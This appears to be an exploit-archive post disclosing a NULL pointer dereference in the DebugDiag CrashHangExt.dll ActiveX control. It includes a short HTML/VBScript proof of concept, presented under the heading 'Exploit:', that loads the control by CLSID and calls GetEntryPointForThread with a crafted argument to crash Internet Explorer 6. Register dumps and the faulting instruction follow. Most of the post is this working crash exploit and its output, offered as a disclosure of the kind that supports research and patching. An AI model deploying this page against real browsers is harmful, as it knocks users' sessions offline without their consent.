|
Name : DebugDiag (CrashHangExt.dll 1.0) NULL Pointer Dereference
Credit : suN8Hclf (DaRk-CodeRs Group), crimson.loyd@gmail.com
Download : http://www.microsoft.com/downloads/details.aspx?FamilyID=28bd5941-c458-46f1-b24d-f60151d875a3&displaylang=en#Overview
Greetz : Luigi Auriemma, Louis Carriere, 0in, cOndemned, e.wiZz!, Gynvael Coldwind, Myo
Katharsis, all fron #dark-coders
=+ Product of Fuzzing +=
This code should crash down Internet Explorer
Tested on:
+ Windows XP SP2 (full patched) & IE 6.0 (full patched)
+ Windows 2000 SP 4 (full patched) & IE 6.0 (full patched)
Marked as:
================================================
Class Utils
GUID: {7233D6F8-AD31-440F-BAF0-9E7A292A53DA}
Number of Interfaces: 1
Default Interface: IUtils
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
================================================
Exploit:
~~~~~~~~~~~~~~~~~~~~~~
-----------------------code.htm--------------------------
<body>
<object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' />
</object>
<script language='vbscript'>
arg1=-2147483647
target.GetEntryPointForThread arg1
</script>
</body>
-----------------------code.htm--------------------------
Info
~~~~~~~~~~~~~~~~~~~~~~
EAX 00000000
ECX 0012DDDC
EDX 001E98EA
EBX 02C318E8 CrashHan.02C318E8
ESP 0012DD88
EBP 0012DE04
ESI 023F1FE0
EDI 00000000
EIP 02C38290 CrashHan.02C38290
IE crashes while trying to execute this line (Null pointer dereference):
02C38290 8B08 MOV ECX,DWORD PTR DS:[EAX]
//www.dark-coders.pl
|
推荐
评论(0条)
